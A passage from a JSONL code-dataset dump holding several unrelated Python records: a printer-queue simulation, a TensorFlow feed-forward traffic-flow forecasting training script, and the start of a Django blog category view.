x:\r\n\t\t\t\tlist_in_list.append(names_list[y[1]-1])\r\n\t\tout_list.append(list_in_list)\r\n\r\n\tprint(out_list)\r\n\r\n\r\nmain()","sub_path":"lab2/4.1.py","file_name":"4.1.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94197206","text":"n = int(input(\"Number of jobs: \"))\n\nm = int(input(\"Job number: \"))\n\npriority = list(map(int,input(\"Job priorities: \").split()))\n\nin_printer = list(range(len(priority)))\n\ntime = 0\n\nwhile True:\n\n    # the front job only prints if nothing queued has a higher priority\n    if priority[0] == max(priority):\n\n        time = time + 1\n\n        if in_printer[0] == m:\n\n            print(time, 'minutes')\n\n            break\n\n        else:\n\n            priority.pop(0)\n\n            in_printer.pop(0)\n\n    else:\n\n        # otherwise the front job is moved to the back of the queue\n        priority.append(priority.pop(0))\n\n        in_printer.append(in_printer.pop(0))\n","sub_path":"que printer.py","file_name":"que printer.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436985241","text":"from utils import DataLoader, define_bands, get_bands\nimport tensorflow as tf\nimport numpy as np\nimport pickle\nimport csv\nimport datetime\nimport os\nfrom shutil import rmtree\nfrom tensorflow.python.client import timeline\n\n# from bnlstm.lstm import BNLSTMCell\n\n# Folder locations etc.\ntf.flags.DEFINE_string(\"data_dir\", \"../data/\", \"Storage Directory\")\ntf.flags.DEFINE_string(\"write_to\", \"../scratch/summaries\", \"Output 
directory\")\ntf.flags.DEFINE_string(\"summaries_dir\", \"../scratch/summaries\",\n \"Directory for Summaries\")\ntf.flags.DEFINE_string(\"model_name\", \"dummy_model\", \"Model Name\")\n\n# Data Handling Parameters\ntf.flags.DEFINE_string(\"dl_n\", \"DL_double_c.pkl\", \"Name of the data loader\")\ntf.flags.DEFINE_integer(\"n_stations\", 30, \"Number of stations\")\n\n# Model parameters\ntf.flags.DEFINE_integer(\"hidden_size\", 16,\n \"Number of hidden parameters in an LSTM block\")\ntf.flags.DEFINE_integer(\"n_ahead\", 24, \"Prediction times\")\ntf.flags.DEFINE_integer(\"single_station\", -1,\n \"index of the station to use. -1: use all stations\")\ntf.flags.DEFINE_integer(\"layers\", 2, \"Number of LSTM layers\")\ntf.flags.DEFINE_integer(\"window_size\", 48, \"Window size\")\ntf.flags.DEFINE_integer(\"cov_start\", 30,\n \"ignore everything before the variable with this index\")\ntf.flags.DEFINE_integer(\"num_cov\", 9,\n \"Number of covariates to use (known into the future)\")\ntf.flags.DEFINE_float(\"keep_rate_in\", 0.8,\n \"Input keep probability in LSTM dropout\")\ntf.flags.DEFINE_float(\"keep_rate_state\", 0.8,\n \"State keep probability in LSTM dropout\")\ntf.flags.DEFINE_float(\"keep_rate_out\", 0.8,\n \"Output keep probability in LSTM dropout\")\ntf.flags.DEFINE_bool(\"allow_batchnorm\", False, \"Switch on Batch normalisation\")\ntf.flags.DEFINE_bool(\"use_gru\", False,\n \"Use a GRU cell instead of an LSTM cell\")\ntf.flags.DEFINE_bool(\"use_stations\", True, \"Whether to include traffic values in training (for cov only model)\")\ntf.flags.DEFINE_bool(\"predict_raw\", True, \"True:Predict raw values, False:Predict deviations\")\ntf.flags.DEFINE_bool(\"show_diffs\", False, \"True:Use Diff bands\")\ntf.flags.DEFINE_bool(\"show_raw\", True, \"True:Use raw bands\")\ntf.flags.DEFINE_bool(\"show_last_week\", False, \"True:Use last-week-bands\")\n\n\n# Meta parameters\ntf.flags.DEFINE_float(\"learning_rate\", 0.0005, \"Learning rate\")\ntf.flags.DEFINE_integer(\"max_iter\", 1500, \"Number of Batches to train on\")\ntf.flags.DEFINE_bool(\"force_init\", True, \"Start training from scratch or not\")\ntf.flags.DEFINE_integer(\"halve_every\", 100000,\n \"Halve learning rate every n steps\")\ntf.flags.DEFINE_bool(\"overtrain\", False, \"Train on a single batch\")\ntf.flags.DEFINE_integer(\"num_sum_stat\", 50,\n \"Number of Summary stats to keep in BN\")\ntf.flags.DEFINE_integer(\"start_at\", 0, \"First allowed training point\")\ntf.flags.DEFINE_bool(\"profile\", False,\n \"Make profile (run only for very few steps)\")\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\nprint(\"\\nCommand-line Arguments:\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\nprint(\"\")\n\nFLAGS.numbers_used = get_bands(FLAGS.show_raw, FLAGS.show_diffs,\n FLAGS.show_last_week)\n# assert 7 < FLAGS.numbers_used < 16, \"Choose correct bands\"\n# assert FLAGS.show_raw or not FLAGS.predict_raw # if raw is predicted, then the data should be visible\n# assert FLAGS.show_diffs or FLAGS.predict_raw # if diffs are predicted, they should be visible\n\n\ndef main():\n if FLAGS.numbers_used > 0:\n relevant_indices = define_bands(FLAGS.numbers_used)\n FLAGS.num_bands = sum(relevant_indices)\n relevant_band = 0 if not (FLAGS.show_raw and not FLAGS.predict_raw) else 1\n\n global station_error\n summaries_dir = FLAGS.summaries_dir + \"/\" + FLAGS.model_name\n if os.path.isdir(summaries_dir) and FLAGS.force_init:\n rmtree(summaries_dir)\n if not os.path.isdir(summaries_dir):\n 
os.makedirs(summaries_dir)\n\n write_to = FLAGS.write_to + \"/\" + FLAGS.model_name\n if os.path.isdir(write_to) and FLAGS.force_init:\n rmtree(write_to)\n if not os.path.isdir(write_to):\n os.makedirs(write_to)\n\n if FLAGS.single_station > -1:\n n_stations = 1\n else:\n n_stations = FLAGS.n_stations\n eval_ = False\n\n with open(FLAGS.data_dir + FLAGS.dl_n, 'rb') as input:\n data_loader = pickle.load(input)\n data_loader.shuffle_starts_lstm()\n print(\"Loaded data_loader\")\n print(\"Training size: %s\" % data_loader.training_data.shape[0])\n data_loader.reset_params(batch_size=FLAGS.window_size,\n window_size=FLAGS.window_size,\n n_ahead=data_loader.n_ahead,\n valid_batch_size=FLAGS.window_size,\n start_at=FLAGS.start_at)\n\n n_ahead = np.array(range(FLAGS.n_ahead)) + 1\n input_ = tf.placeholder(tf.float32,\n [data_loader.batch_size, data_loader.window_size,\n FLAGS.num_cov + n_stations, FLAGS.num_bands],\n name=\"input_placeholder\")\n\n output_ = tf.placeholder(tf.float32,\n [data_loader.batch_size, len(n_ahead),\n FLAGS.num_cov + n_stations, FLAGS.num_bands],\n name=\"output_placeholder\")\n\n keep_rate_in = tf.placeholder(tf.float32,\n name=\"keep_rate_input_placeholder\")\n keep_rate_state = tf.placeholder(tf.float32,\n name=\"keep_rate_state_placeholder\")\n keep_rate_out = tf.placeholder(tf.float32,\n name=\"keep_rate_output_placeholder\")\n\n eff_rate = tf.placeholder(tf.float32, name=\"eff_rate_placeholder\")\n current_rate = FLAGS.learning_rate\n is_training = tf.placeholder(tf.bool, name=\"is_training\")\n\n # The model is multivariate and independent from covariates.\n # It solely predicts future flows from past flows (of all stations)\n\n l1 = tf.contrib.layers.fully_connected(\n inputs=tf.reshape(input_[:, :, : FLAGS.num_cov + n_stations * FLAGS.use_stations, :], [data_loader.batch_size, FLAGS.window_size * (FLAGS.num_cov + n_stations * FLAGS.use_stations) * FLAGS.num_bands]),\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l1d = tf.contrib.layers.dropout(l1,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l2 = tf.contrib.layers.fully_connected(\n inputs=l1d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l2d = tf.contrib.layers.dropout(l2,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l3 = tf.contrib.layers.fully_connected(\n inputs=l2d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l3d = tf.contrib.layers.dropout(l3,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l4 = tf.contrib.layers.fully_connected(\n inputs=l3d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l4d = tf.contrib.layers.dropout(l4,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n l5 = tf.contrib.layers.fully_connected(\n inputs=l4d,\n num_outputs=FLAGS.hidden_size,\n activation_fn=tf.nn.relu\n )\n l5d = tf.contrib.layers.dropout(l5,\n keep_prob=keep_rate_state,\n is_training=is_training)\n\n final_layer = {'1': l1d,\n '2': l2d,\n '3': l3d,\n '4': l4d,\n '5': l5d}[str(FLAGS.layers)]\n\n predicted = tf.reshape(tf.contrib.layers.fully_connected(\n inputs=final_layer,\n num_outputs=len(n_ahead) * n_stations,\n activation_fn=None\n ), [data_loader.batch_size, len(n_ahead), n_stations])\n\n target = output_[:, :, FLAGS.num_cov:, relevant_band]\n\n predict=predicted\n target_auto=target[:, :-1, :]\n\n # Losses\n l2 = (target - predicted) ** 2\n l2_selected = l2[:, :, :min(30, n_stations)]\n rmse_avg = tf.sqrt(tf.reduce_mean(l2))\n rmse_avg_selected = tf.sqrt(tf.reduce_mean(l2_selected))\n 
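# diagnostics: RMSE restricted to the forecast horizon, plus per-time-step and per-station breakdowns kept for the CSV summaries\n    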
rmse_future = tf.sqrt(tf.reduce_mean(l2[:, -FLAGS.n_ahead:, :]))\n rmse_by_station = tf.sqrt(tf.reduce_mean(l2, axis=[0]))\n rmse_by_time = tf.sqrt(\n tf.reduce_mean(l2[:, -FLAGS.n_ahead:, :], axis=[0, 2]))\n rmse_by_time_selected = tf.sqrt(\n tf.reduce_mean(l2_selected[:, -FLAGS.n_ahead:, :], axis=[0, 2]))\n\n l2_auto = (target_auto - predict[:, :-1, :]) ** 2\n rmse_auto = tf.sqrt(tf.reduce_mean(l2_auto))\n\n # Optimisation\n global_counter = tf.Variable(1, trainable=False)\n global_counter_init = global_counter.assign(1)\n last_step = tf.placeholder(tf.int32)\n global_counter_end = global_counter.assign(last_step)\n best_step = tf.Variable(1, trainable=False, dtype=tf.int32)\n step_ = tf.placeholder(tf.int32)\n set_best_step = best_step.assign(step_)\n best_error = tf.Variable(9999999999, trainable=False, dtype=tf.float32)\n error_ = tf.placeholder(tf.float32)\n set_best_error = best_error.assign(error_)\n\n train_step = tf.train.AdamOptimizer(eff_rate).minimize(rmse_avg,\n global_step=global_counter)\n train_step_auto = tf.train.AdamOptimizer(eff_rate).minimize(rmse_auto)\n\n # Summaries\n rmse_avg_summary = tf.summary.scalar(\"rmse_avg\", rmse_avg)\n rmse_avg_summary_selected = tf.summary.scalar(\"rmse_avg_selected\",\n rmse_avg_selected)\n rmse_by_station_summary = tf.summary.histogram(\"rmse_by_station\",\n rmse_by_station)\n\n rmse_one = tf.summary.scalar(\"one_ahead\", rmse_by_time[0])\n rmse_one_hour = tf.summary.scalar(\"one_hour_ahead\", rmse_by_time[3])\n rmse_three_hours = tf.summary.scalar(\"three_hours_ahead\",\n rmse_by_time[11])\n rmse_six_hours = tf.summary.scalar(\"six_hours_ahead\", rmse_by_time[23])\n\n train_summaries = tf.summary.merge([rmse_avg_summary,\n rmse_avg_summary_selected,\n rmse_by_station_summary,\n rmse_one,\n rmse_one_hour,\n rmse_three_hours,\n rmse_six_hours])\n\n saver = tf.train.Saver(max_to_keep=1)\n saver2 = tf.train.Saver(max_to_keep=1)\n init_op = tf.global_variables_initializer()\n\n total_parameters = 0\n for variable in tf.trainable_variables():\n shape = variable.get_shape()\n print(variable.name)\n print(shape)\n variable_parametes = 1\n for dim in shape:\n variable_parametes *= dim.value\n total_parameters += variable_parametes\n print(\"Built a graph with a total of %d trainable parameters\" % (\n total_parameters))\n\n if FLAGS.overtrain:\n x, y = data_loader.get_one_batch()\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n if FLAGS.single_station >= 0:\n x = x[:, :,\n list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :,\n list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n\n with tf.Session() as sess:\n time = datetime.datetime.now()\n if FLAGS.profile:\n options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n else:\n options = None\n run_metadata = None\n\n if not FLAGS.force_init:\n try:\n saver.restore(sess, tf.train.latest_checkpoint(write_to))\n print(\"Recovered Session\")\n except:\n sess.run(init_op)\n print(\"Unexpectedly initialised session\")\n # global_counter_init\n\n else:\n sess.run(init_op)\n print(\"Initialised session\")\n\n gc = 
sess.run(global_counter)\n\n print(\"Starting running the Graph\\n\")\n train_writer = tf.summary.FileWriter(summaries_dir, sess.graph)\n while gc < FLAGS.max_iter:\n\n # Validation first, to ensure gc does not increase\n if ((gc % 25000 == 0 and gc > 1) or (gc == 25000) or (\n gc == FLAGS.max_iter - 1)) and not FLAGS.overtrain:\n try:\n del time_error, time_error_selected, station_error\n except NameError:\n pass\n\n eval_ = True\n data_loader.reset_valid_indexes(shuffle=False)\n print(\"Start validation: %s\" % datetime.datetime.now().time())\n n = 0\n for j in range(\n int(len(\n data_loader.valid_indexes) /\n data_loader.valid_batch_size)):\n x, y, keep_v = data_loader.get_valid_batch_lstm()\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations), relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations), relevant_indices]\n if FLAGS.single_station >= 0:\n x = x[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1], sum(relevant_indices))\n else:\n x = x.reshape(\n [data_loader.valid_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n y = y.reshape(\n [data_loader.valid_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n n += x.shape[0]\n time_fut, station_fut, time_fut_selected = sess.run(\n [rmse_by_time, rmse_by_station,\n rmse_by_time_selected],\n feed_dict={input_: x,\n output_: y,\n keep_rate_in: 1.0,\n keep_rate_state: 1.0,\n keep_rate_out: 1.0,\n is_training: False},\n options=options, run_metadata=run_metadata)\n try:\n time_error += (time_fut ** 2) * x.shape[0]\n time_error_selected += (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error += (station_fut ** 2) * x.shape[0]\n except NameError:\n time_error = (time_fut ** 2) * x.shape[0]\n time_error_selected = (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error = (station_fut ** 2) * x.shape[0]\n\n time_error = np.sqrt(\n time_error / n)\n time_error_selected = np.sqrt(\n time_error_selected / n)\n station_error = np.sqrt(\n station_error / n)\n print(\n \"Finished validation at %s\" % datetime.datetime.now().time())\n\n np.savetxt(\n os.path.join(write_to, 'eval_time_error.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error' + str(gc) + '.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to, 'eval_time_error_selected.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error_selected' + str(\n gc) + '.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to, 'eval_station_error.csv'),\n station_error, delimiter=',')\n\n badness = np.sqrt(np.mean(np.square(time_error)))\n if badness < sess.run(best_error):\n sess.run([set_best_step, set_best_error],\n feed_dict={step_: gc, error_: badness})\n save_path = saver2.save(sess,\n os.path.join(write_to,\n 'model_best'))\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error_best.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_time_error_selected_best.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'eval_station_error_best.csv'),\n station_error, 
delimiter=',')\n else:\n if gc - sess.run(best_step) >= 200000 and gc > 500000:\n sess.run(global_counter_end,\n feed_dict={last_step: FLAGS.max_iter - 1})\n # End of validation on validation set\n\n if gc % 25000 == 0:\n # Every now and then reshuffle the batches and start from zero\n data_loader.shuffle_starts_lstm()\n\n # Then training\n if not FLAGS.overtrain:\n x, y, keep = data_loader.get_one_batch_lstm(\n allow_keep=(not eval_))\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n eval_ = False\n if FLAGS.single_station >= 0:\n x = x[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1, FLAGS.num_cov + 1, sum(relevant_indices)])\n if (gc % 75 == 0 and gc >= 1) or (gc == FLAGS.max_iter - 1):\n if gc < 750 or gc % 750 == 0:\n print(datetime.datetime.now() - time)\n time = datetime.datetime.now()\n if gc < 750 or gc % 750 == 0:\n print(\"Summary at iteration %s\" % gc)\n gc, predicted_, target_, summaries, rmse_by_time_, rmse_by_station_, rmse_by_time_selected_ = \\\n sess.run(\n [global_counter, predicted, target,\n train_summaries, rmse_by_time, rmse_by_station,\n rmse_by_time_selected],\n feed_dict={input_: x,\n output_: y,\n eff_rate: current_rate,\n keep_rate_in: 1.0,\n keep_rate_state: 1.0,\n keep_rate_out: 1.0,\n is_training: False},\n options=options, run_metadata=run_metadata)\n\n train_writer.add_summary(summaries, gc)\n try:\n rmse_by_time__ = 0.9 * rmse_by_time__ + 0.1 * rmse_by_time_\n rmse_by_time_selected__ = 0.9 * rmse_by_time_selected__ + 0.1 * rmse_by_time_selected_\n rmse_by_station__ = 0.9 * rmse_by_station__ + 0.1 * rmse_by_station_\n except NameError:\n rmse_by_time__ = rmse_by_time_\n rmse_by_time_selected__ = rmse_by_time_selected_\n rmse_by_station__ = rmse_by_station_\n\n if (gc % 7500 == 0 and gc >= 1) or (gc == FLAGS.max_iter - 1):\n save_path = saver.save(sess,\n os.path.join(write_to, 'model'),\n gc)\n np.savetxt(write_to + \"/y_train.csv\", target_[0, :, :],\n delimiter=\",\")\n np.savetxt(write_to + \"/yhat_train.csv\",\n predicted_[0, :, :],\n delimiter=\",\")\n np.savetxt(write_to + \"/rmse_by_time_train.csv\",\n rmse_by_time__, delimiter=\",\")\n np.savetxt(write_to + \"/rmse_by_time_selected_train.csv\",\n rmse_by_time_selected__, delimiter=\",\")\n np.savetxt(write_to + \"/rmse_by_station_train.csv\",\n rmse_by_station__, delimiter=\",\")\n\n _, gc = sess.run(\n [train_step, global_counter],\n feed_dict={input_: x,\n output_: y,\n eff_rate: current_rate,\n keep_rate_in: FLAGS.keep_rate_in,\n keep_rate_state: FLAGS.keep_rate_state,\n keep_rate_out: FLAGS.keep_rate_out,\n is_training: False},\n options=options, run_metadata=run_metadata)\n\n current_rate = FLAGS.learning_rate / 2 ** int(\n gc / FLAGS.halve_every)\n if gc >= FLAGS.max_iter:\n save_path = saver.save(sess, os.path.join(write_to, 'model'),\n gc)\n # Test set (once on last, once on best)\n for jj in range(2):\n try:\n del time_error, time_error_selected, station_error\n except NameError:\n pass\n if jj == 0:\n print(\"Getting parameters of best validation set\")\n saver.restore(sess,\n tf.train.latest_checkpoint(write_to))\n print(\"Restored last 
parameters\")\n else:\n print(\"Getting parameters of best validation set\")\n saver.restore(sess,\n os.path.join(write_to, 'model_best'))\n print(\"Restored best parameters\")\n data_loader.reset_test_indexes(shuffle=False)\n n = 0\n for j in range(\n int(len(\n data_loader.test_indexes) /\n data_loader.test_batch_size)):\n x, y, keep_v = data_loader.get_test_batch_lstm()\n x = x[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n y = y[:, :, FLAGS.cov_start:(\n FLAGS.cov_start + FLAGS.num_cov + FLAGS.n_stations),\n relevant_indices]\n if FLAGS.single_station >= 0:\n x = x[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1,\n FLAGS.num_cov + 1, sum(relevant_indices)])\n y = y[:, :, list(range(FLAGS.num_cov)) + [\n FLAGS.num_cov + FLAGS.single_station], sum(relevant_indices)].reshape(\n [data_loader.batch_size, -1,\n FLAGS.num_cov + 1, sum(relevant_indices)])\n else:\n x = x.reshape(\n [data_loader.test_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n y = y.reshape(\n [data_loader.test_batch_size, -1,\n FLAGS.num_cov + FLAGS.n_stations, sum(relevant_indices)])\n n += x.shape[0]\n time_fut, station_fut, time_fut_selected = sess.run(\n [rmse_by_time, rmse_by_station,\n rmse_by_time_selected],\n feed_dict={input_: x,\n output_: y,\n keep_rate_in: 1.0,\n keep_rate_state: 1.0,\n keep_rate_out: 1.0,\n is_training: False},\n options=options, run_metadata=run_metadata)\n try:\n time_error += (time_fut ** 2) * x.shape[0]\n time_error_selected += (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error += (station_fut ** 2) * x.shape[0]\n except NameError:\n time_error = (time_fut ** 2) * x.shape[0]\n time_error_selected = (time_fut_selected ** 2) * \\\n x.shape[0]\n station_error = (station_fut ** 2) * x.shape[0]\n\n time_error = np.sqrt(\n time_error / n)\n time_error_selected = np.sqrt(\n time_error_selected / n)\n station_error = np.sqrt(\n station_error / n)\n\n if jj == 0:\n suffix = \"_last\"\n else:\n suffix = \"_best\"\n np.savetxt(\n os.path.join(write_to,\n 'test_time_error' + suffix + '.csv'),\n time_error, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'test_time_error_selected' + suffix + '.csv'),\n time_error_selected, delimiter=',')\n np.savetxt(\n os.path.join(write_to,\n 'test_station_error' + suffix + '.csv'),\n station_error, delimiter=',')\n # End of evaluation on test set\n if FLAGS.profile:\n fetched_timeline = timeline.Timeline(run_metadata.step_stats)\n chrome_trace = fetched_timeline.generate_chrome_trace_format()\n with open('timeline_01.json', 'w') as f:\n f.write(chrome_trace)\n print(\"All done\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"FFNN_flow_model.py","file_name":"FFNN_flow_model.py","file_ext":"py","file_size_in_byte":30985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295852505","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport json\nfrom django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.urls import reverse\nfrom backend.auth.auth import check_login\nfrom repository import models\nfrom utils.pagination import Pagination\n\n\n\n\n@check_login\ndef category(request):\n \"\"\"\n 博主个人分类管理\n :param request:\n :return:\n \"\"\"\n user = request.session['user_info']\n user_info = models.UserInfo.objects.filter(username=user['username']).first()\n blog_id = 
request.session['user_info']['blog__nid']\n    # fetch all categories of the current blog, along with the article count of each category\n    obj = models.Category.objects.filter(blog__nid=blog_id).order_by(\"-nid\").values('nid', 'title')\n    for item in obj:\n        category_id = item['nid']\n        # note: the dicts yielded by .values() are regenerated if the queryset is re-evaluated\n        item['counts'] = models.Article.objects.filter(category_id=category_id).count()\n    # obj =